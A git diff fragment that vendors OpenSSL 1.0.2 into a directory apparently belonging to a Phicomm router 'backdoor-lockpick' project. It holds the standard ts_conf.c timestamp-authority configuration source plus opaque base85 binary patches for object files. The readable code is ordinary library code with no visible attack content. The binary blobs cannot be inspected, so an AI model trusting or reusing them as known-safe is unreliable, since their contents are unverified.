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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_conf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_conf.c
new file mode 100644
index 0000000..4716b23
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_conf.c
@@ -0,0 +1,491 @@
+/* crypto/ts/ts_conf.c */
+/*
+ * Written by Zoltan Glozik (zglozik@stones.com) for the OpenSSL project
+ * 2002.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <string.h>
+
+#include <openssl/crypto.h>
+#include "cryptlib.h"
+#include <openssl/pem.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include <openssl/ts.h>
+
+/* Macro definitions for the configuration file. */
+
+#define BASE_SECTION                    "tsa"
+#define ENV_DEFAULT_TSA                 "default_tsa"
+#define ENV_SERIAL                      "serial"
+#define ENV_CRYPTO_DEVICE               "crypto_device"
+#define ENV_SIGNER_CERT                 "signer_cert"
+#define ENV_CERTS                       "certs"
+#define ENV_SIGNER_KEY                  "signer_key"
+#define ENV_DEFAULT_POLICY              "default_policy"
+#define ENV_OTHER_POLICIES              "other_policies"
+#define ENV_DIGESTS                     "digests"
+#define ENV_ACCURACY                    "accuracy"
+#define ENV_ORDERING                    "ordering"
+#define ENV_TSA_NAME                    "tsa_name"
+#define ENV_ESS_CERT_ID_CHAIN           "ess_cert_id_chain"
+#define ENV_VALUE_SECS                  "secs"
+#define ENV_VALUE_MILLISECS             "millisecs"
+#define ENV_VALUE_MICROSECS             "microsecs"
+#define ENV_CLOCK_PRECISION_DIGITS      "clock_precision_digits"
+#define ENV_VALUE_YES                   "yes"
+#define ENV_VALUE_NO                    "no"
+
+/* Function definitions for certificate and key loading. */
+
+X509 *TS_CONF_load_cert(const char *file)
+{
+    BIO *cert = NULL;
+    X509 *x = NULL;
+
+    if ((cert = BIO_new_file(file, "r")) == NULL)
+        goto end;
+    x = PEM_read_bio_X509_AUX(cert, NULL, NULL, NULL);
+ end:
+    if (x == NULL)
+        fprintf(stderr, "unable to load certificate: %s\n", file);
+    BIO_free(cert);
+    return x;
+}
+
+STACK_OF(X509) *TS_CONF_load_certs(const char *file)
+{
+    BIO *certs = NULL;
+    STACK_OF(X509) *othercerts = NULL;
+    STACK_OF(X509_INFO) *allcerts = NULL;
+    int i;
+
+    if (!(certs = BIO_new_file(file, "r")))
+        goto end;
+
+    if (!(othercerts = sk_X509_new_null()))
+        goto end;
+    allcerts = PEM_X509_INFO_read_bio(certs, NULL, NULL, NULL);
+    for (i = 0; i < sk_X509_INFO_num(allcerts); i++) {
+        X509_INFO *xi = sk_X509_INFO_value(allcerts, i);
+        if (xi->x509) {
+            sk_X509_push(othercerts, xi->x509);
+            xi->x509 = NULL;
+        }
+    }
+ end:
+    if (othercerts == NULL)
+        fprintf(stderr, "unable to load certificates: %s\n", file);
+    sk_X509_INFO_pop_free(allcerts, X509_INFO_free);
+    BIO_free(certs);
+    return othercerts;
+}
+
+EVP_PKEY *TS_CONF_load_key(const char *file, const char *pass)
+{
+    BIO *key = NULL;
+    EVP_PKEY *pkey = NULL;
+
+    if (!(key = BIO_new_file(file, "r")))
+        goto end;
+    pkey = PEM_read_bio_PrivateKey(key, NULL, NULL, (char *)pass);
+ end:
+    if (pkey == NULL)
+        fprintf(stderr, "unable to load private key: %s\n", file);
+    BIO_free(key);
+    return pkey;
+}
+
+/* Function definitions for handling configuration options. */
+
+static void TS_CONF_lookup_fail(const char *name, const char *tag)
+{
+    fprintf(stderr, "variable lookup failed for %s::%s\n", name, tag);
+}
+
+static void TS_CONF_invalid(const char *name, const char *tag)
+{
+    fprintf(stderr, "invalid variable value for %s::%s\n", name, tag);
+}
+
+const char *TS_CONF_get_tsa_section(CONF *conf, const char *section)
+{
+    if (!section) {
+        section = NCONF_get_string(conf, BASE_SECTION, ENV_DEFAULT_TSA);
+        if (!section)
+            TS_CONF_lookup_fail(BASE_SECTION, ENV_DEFAULT_TSA);
+    }
+    return section;
+}
+
+int TS_CONF_set_serial(CONF *conf, const char *section, TS_serial_cb cb,
+                       TS_RESP_CTX *ctx)
+{
+    int ret = 0;
+    char *serial = NCONF_get_string(conf, section, ENV_SERIAL);
+    if (!serial) {
+        TS_CONF_lookup_fail(section, ENV_SERIAL);
+        goto err;
+    }
+    TS_RESP_CTX_set_serial_cb(ctx, cb, serial);
+
+    ret = 1;
+ err:
+    return ret;
+}
+
+#ifndef OPENSSL_NO_ENGINE
+
+int TS_CONF_set_crypto_device(CONF *conf, const char *section,
+                              const char *device)
+{
+    int ret = 0;
+
+    if (!device)
+        device = NCONF_get_string(conf, section, ENV_CRYPTO_DEVICE);
+
+    if (device && !TS_CONF_set_default_engine(device)) {
+        TS_CONF_invalid(section, ENV_CRYPTO_DEVICE);
+        goto err;
+    }
+    ret = 1;
+ err:
+    return ret;
+}
+
+int TS_CONF_set_default_engine(const char *name)
+{
+    ENGINE *e = NULL;
+    int ret = 0;
+
+    /* Leave the default if builtin specified. */
+    if (strcmp(name, "builtin") == 0)
+        return 1;
+
+    if (!(e = ENGINE_by_id(name)))
+        goto err;
+    /* Enable the use of the NCipher HSM for forked children. */
+    if (strcmp(name, "chil") == 0)
+        ENGINE_ctrl(e, ENGINE_CTRL_CHIL_SET_FORKCHECK, 1, 0, 0);
+    /* All the operations are going to be carried out by the engine. */
+    if (!ENGINE_set_default(e, ENGINE_METHOD_ALL))
+        goto err;
+    ret = 1;
+ err:
+    if (!ret) {
+        TSerr(TS_F_TS_CONF_SET_DEFAULT_ENGINE, TS_R_COULD_NOT_SET_ENGINE);
+        ERR_add_error_data(2, "engine:", name);
+    }
+    if (e)
+        ENGINE_free(e);
+    return ret;
+}
+
+#endif
+
+int TS_CONF_set_signer_cert(CONF *conf, const char *section,
+                            const char *cert, TS_RESP_CTX *ctx)
+{
+    int ret = 0;
+    X509 *cert_obj = NULL;
+    if (!cert)
+        cert = NCONF_get_string(conf, section, ENV_SIGNER_CERT);
+    if (!cert) {
+        TS_CONF_lookup_fail(section, ENV_SIGNER_CERT);
+        goto err;
+    }
+    if (!(cert_obj = TS_CONF_load_cert(cert)))
+        goto err;
+    if (!TS_RESP_CTX_set_signer_cert(ctx, cert_obj))
+        goto err;
+
+    ret = 1;
+ err:
+    X509_free(cert_obj);
+    return ret;
+}
+
+int TS_CONF_set_certs(CONF *conf, const char *section, const char *certs,
+                      TS_RESP_CTX *ctx)
+{
+    int ret = 0;
+    STACK_OF(X509) *certs_obj = NULL;
+    if (!certs)
+        certs = NCONF_get_string(conf, section, ENV_CERTS);
+    /* Certificate chain is optional. */
+    if (!certs)
+        goto end;
+    if (!(certs_obj = TS_CONF_load_certs(certs)))
+        goto err;
+    if (!TS_RESP_CTX_set_certs(ctx, certs_obj))
+        goto err;
+ end:
+    ret = 1;
+ err:
+    sk_X509_pop_free(certs_obj, X509_free);
+    return ret;
+}
+
+int TS_CONF_set_signer_key(CONF *conf, const char *section,
+                           const char *key, const char *pass,
+                           TS_RESP_CTX *ctx)
+{
+    int ret = 0;
+    EVP_PKEY *key_obj = NULL;
+    if (!key)
+        key = NCONF_get_string(conf, section, ENV_SIGNER_KEY);
+    if (!key) {
+        TS_CONF_lookup_fail(section, ENV_SIGNER_KEY);
+        goto err;
+    }
+    if (!(key_obj = TS_CONF_load_key(key, pass)))
+        goto err;
+    if (!TS_RESP_CTX_set_signer_key(ctx, key_obj))
+        goto err;
+
+    ret = 1;
+ err:
+    EVP_PKEY_free(key_obj);
+    return ret;
+}
+
+int TS_CONF_set_def_policy(CONF *conf, const char *section,
+                           const char *policy, TS_RESP_CTX *ctx)
+{
+    int ret = 0;
+    ASN1_OBJECT *policy_obj = NULL;
+    if (!policy)
+        policy = NCONF_get_string(conf, section, ENV_DEFAULT_POLICY);
+    if (!policy) {
+        TS_CONF_lookup_fail(section, ENV_DEFAULT_POLICY);
+        goto err;
+    }
+    if (!(policy_obj = OBJ_txt2obj(policy, 0))) {
+        TS_CONF_invalid(section, ENV_DEFAULT_POLICY);
+        goto err;
+    }
+    if (!TS_RESP_CTX_set_def_policy(ctx, policy_obj))
+        goto err;
+
+    ret = 1;
+ err:
+    ASN1_OBJECT_free(policy_obj);
+    return ret;
+}
+
+int TS_CONF_set_policies(CONF *conf, const char *section, TS_RESP_CTX *ctx)
+{
+    int ret = 0;
+    int i;
+    STACK_OF(CONF_VALUE) *list = NULL;
+    char *policies = NCONF_get_string(conf, section,
+                                      ENV_OTHER_POLICIES);
+    /* If no other policy is specified, that's fine. */
+    if (policies && !(list = X509V3_parse_list(policies))) {
+        TS_CONF_invalid(section, ENV_OTHER_POLICIES);
+        goto err;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(list); ++i) {
+        CONF_VALUE *val = sk_CONF_VALUE_value(list, i);
+        const char *extval = val->value ? val->value : val->name;
+        ASN1_OBJECT *objtmp;
+        if (!(objtmp = OBJ_txt2obj(extval, 0))) {
+            TS_CONF_invalid(section, ENV_OTHER_POLICIES);
+            goto err;
+        }
+        if (!TS_RESP_CTX_add_policy(ctx, objtmp))
+            goto err;
+        ASN1_OBJECT_free(objtmp);
+    }
+
+    ret = 1;
+ err:
+    sk_CONF_VALUE_pop_free(list, X509V3_conf_free);
+    return ret;
+}
+
+int TS_CONF_set_digests(CONF *conf, const char *section, TS_RESP_CTX *ctx)
+{
+    int ret = 0;
+    int i;
+    STACK_OF(CONF_VALUE) *list = NULL;
+    char *digests = NCONF_get_string(conf, section, ENV_DIGESTS);
+    if (!digests) {
+        TS_CONF_lookup_fail(section, ENV_DIGESTS);
+        goto err;
+    }
+    if (!(list = X509V3_parse_list(digests))) {
+        TS_CONF_invalid(section, ENV_DIGESTS);
+        goto err;
+    }
+    if (sk_CONF_VALUE_num(list) == 0) {
+        TS_CONF_invalid(section, ENV_DIGESTS);
+        goto err;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(list); ++i) {
+        CONF_VALUE *val = sk_CONF_VALUE_value(list, i);
+        const char *extval = val->value ? val->value : val->name;
+        const EVP_MD *md;
+        if (!(md = EVP_get_digestbyname(extval))) {
+            TS_CONF_invalid(section, ENV_DIGESTS);
+            goto err;
+        }
+        if (!TS_RESP_CTX_add_md(ctx, md))
+            goto err;
+    }
+
+    ret = 1;
+ err:
+    sk_CONF_VALUE_pop_free(list, X509V3_conf_free);
+    return ret;
+}
+
+int TS_CONF_set_accuracy(CONF *conf, const char *section, TS_RESP_CTX *ctx)
+{
+    int ret = 0;
+    int i;
+    int secs = 0, millis = 0, micros = 0;
+    STACK_OF(CONF_VALUE) *list = NULL;
+    char *accuracy = NCONF_get_string(conf, section, ENV_ACCURACY);
+
+    if (accuracy && !(list = X509V3_parse_list(accuracy))) {
+        TS_CONF_invalid(section, ENV_ACCURACY);
+        goto err;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(list); ++i) {
+        CONF_VALUE *val = sk_CONF_VALUE_value(list, i);
+        if (strcmp(val->name, ENV_VALUE_SECS) == 0) {
+            if (val->value)
+                secs = atoi(val->value);
+        } else if (strcmp(val->name, ENV_VALUE_MILLISECS) == 0) {
+            if (val->value)
+                millis = atoi(val->value);
+        } else if (strcmp(val->name, ENV_VALUE_MICROSECS) == 0) {
+            if (val->value)
+                micros = atoi(val->value);
+        } else {
+            TS_CONF_invalid(section, ENV_ACCURACY);
+            goto err;
+        }
+    }
+    if (!TS_RESP_CTX_set_accuracy(ctx, secs, millis, micros))
+        goto err;
+
+    ret = 1;
+ err:
+    sk_CONF_VALUE_pop_free(list, X509V3_conf_free);
+    return ret;
+}
+
+int TS_CONF_set_clock_precision_digits(CONF *conf, const char *section,
+                                       TS_RESP_CTX *ctx)
+{
+    int ret = 0;
+    long digits = 0;
+
+    /*
+     * If not specified, set the default value to 0, i.e. sec precision
+     */
+    if (!NCONF_get_number_e(conf, section, ENV_CLOCK_PRECISION_DIGITS,
+                            &digits))
+        digits = 0;
+    if (digits < 0 || digits > TS_MAX_CLOCK_PRECISION_DIGITS) {
+        TS_CONF_invalid(section, ENV_CLOCK_PRECISION_DIGITS);
+        goto err;
+    }
+
+    if (!TS_RESP_CTX_set_clock_precision_digits(ctx, digits))
+        goto err;
+
+    return 1;
+ err:
+    return ret;
+}
+
+static int TS_CONF_add_flag(CONF *conf, const char *section,
+                            const char *field, int flag, TS_RESP_CTX *ctx)
+{
+    /* Default is false. */
+    const char *value = NCONF_get_string(conf, section, field);
+    if (value) {
+        if (strcmp(value, ENV_VALUE_YES) == 0)
+            TS_RESP_CTX_add_flags(ctx, flag);
+        else if (strcmp(value, ENV_VALUE_NO) != 0) {
+            TS_CONF_invalid(section, field);
+            return 0;
+        }
+    }
+
+    return 1;
+}
+
+int TS_CONF_set_ordering(CONF *conf, const char *section, TS_RESP_CTX *ctx)
+{
+    return TS_CONF_add_flag(conf, section, ENV_ORDERING, TS_ORDERING, ctx);
+}
+
+int TS_CONF_set_tsa_name(CONF *conf, const char *section, TS_RESP_CTX *ctx)
+{
+    return TS_CONF_add_flag(conf, section, ENV_TSA_NAME, TS_TSA_NAME, ctx);
+}
+
+int TS_CONF_set_ess_cert_id_chain(CONF *conf, const char *section,
+                                  TS_RESP_CTX *ctx)
+{
+    return TS_CONF_add_flag(conf, section, ENV_ESS_CERT_ID_CHAIN,
+                            TS_ESS_CERT_ID_CHAIN, ctx);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_conf.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_conf.o
new file mode 100644
index 0000000000000000000000000000000000000000..7beae886fbf5eb4aa35fb0d1d2a91c63c95b238a
GIT binary patch
literal 11312
zcmb_h3vg7`8NMU|0>UN;N>G$lgAFP%8$ceTG&k8zZeU5kJj4QCH@ll;CE1O;cQL6J
zJ41rrhD2tlZO2hN)^^4|bg-j+SjO2YkH`#K$49lT<72b~7%fsOTB@Y~f9`+o{(G~R
zaXLLSd+$Bp`Tpm5+<VU68wl1HOqrs{GDTUdWNQ*tl>HUi=Nj=?qj;3rie{eGhHpYZ
zGf(?6+Q<rgK4}52P3kSG`6sn~gLy=4YcyY1TN}-PwVkkp4*w4AYeOF!O{7gTPl>jn
zO!`8<c`j&vE~<hzzQjRN&5URW3}uYjLGvF$^Z1G6#KeRzvrXNqZc}el^@E?5Tz*z<
zBf&=VE49@&u7Q!uD59YGp)V8geLzHEbo^r9QQs@RGnzRj>W$_h5HVhqJ_gNqg&oUA
zyKUo~+6GoyNairgY~~8qTWW(8Y5*-9mP-ArKiS#fHvzH|p$%7Q=0R=fj8TH&iM)*!
z;!T}6GJe!{|DV2$?_+WS;;@LrqKBj^X>f~lT)mCbBk}_MLh@ffL-T{?dwEiHENhab
zNHafyIMQpiT_2TcBNvHKtTAMHE4sr1v=JI-{_^4zgI`TdXv6TN?K)I;(02KC(t#uD
zSes^kW^0*CaiA9sAnePG&)3X9(g;DjV%Xr&U>yjf^F`=4&3s)OdL?}=X@{&>dZCNJ
z!FkXLEXyaqoR}E@2H3GvE@;L)%{&6>mgrDMEqU;eOo~5e+~k_QL<V&LX9lxud~GYa
zot|r~z0rJ0ZQEcTwgOc*ef?0+{Rcw524V=BXJlMBZeetvH`;GW57=mfJmV@rsa{Mm
zvuM+ED9JeH2hs8sVA*$uQ|2+sJwO4c#?R}Cbi^7#x2TYeKg)DOFMQV40wc4OnJ`M_
z)Tcn3eSaHYAiCCCmLT@lpgA#dkc6x$yZX(YtHE3IZ3`XlFV%)7(nZ>Ee=$YSXpZ4v
zde)BM)QRWLig7yCS`qC&H2vkXgc=zCvtay}ZrR2cwsu@oKf~2VGhaP#8c&_L2`r2+
z%8e+UP2#B&D}jJX>;(=iO2Vva9s)--=I9($vku~eMQU<@7GfU3VewPVd?%~KxEK~J
z5EBTja`zrk#TeJ@SVhYg*-LV`KtJJnisJ?Qr$RGZ%S$JRii6Nvrmemz8GHaH&=_P5
z=R1TG@O>QcO^jcp4d0FZVayQbFu&@=Sk|vEN=6?A0eJUFjAF;`!<E>)r@TyvYQyjZ
zVLl}ZlUmBDMbLp+nY(z5eF2%=ME;Zvrs2&cn5udBWH(gomMz(qBPW}nGHk$L0Q04O
z^R(amP)<i$W^xk>gQfy<3gaf{l?Vxajk1VqC$7m6ZMbN01q81_R*K;TZ@#CE6_sQD
zD1vmc1hnDh<=U=u({}K+_RQyE4429m)ljD7!A!|-GTLykyf~sQn<caxQ-wBM%)uuy
z85_-)e_w!xt+&F-7eEoN&WMXI1j6?-yom9C1o)0nG8XFSiF$hyiS6k=Z)Ygh6ODK~
z6G`vl)S5MmQ!|xVd`GA!7V+9tsHUSil!0hUi6@k#l8y^yMgsJOBHnN`X~a5X;gAts
z1Nvs3r#+RI(3gzu0AcU;=z!H8iFSt4J%(<iLJIy;QSiS<NyWP2(WH*{6uhJ)0)mQ^
z=}Yv)!UIae=mx5&#K7-JtSg!VflxS{PKKa86%D79-dImhjGn^Dgm?<~B*NSEzGO5U
zOT`j#9VBBQm`FyziFg<KqsK$NQ6-v630L%3L=Sg|VsS-jsH<D!t!V2=$Bndib>*_k
zs-?b_X;Jm<tgfo8TE4`B73`r>_)UdhLsOdqJ)A*Ie7(SZ9{jLO`S#7ql>X8wm(H4A
zycfC~WfqDSMY)vjh*deTRZ#a6b}!y*J*5v61UzM<g#nLuq$uF2*fZ7dsoFiQAmpj2
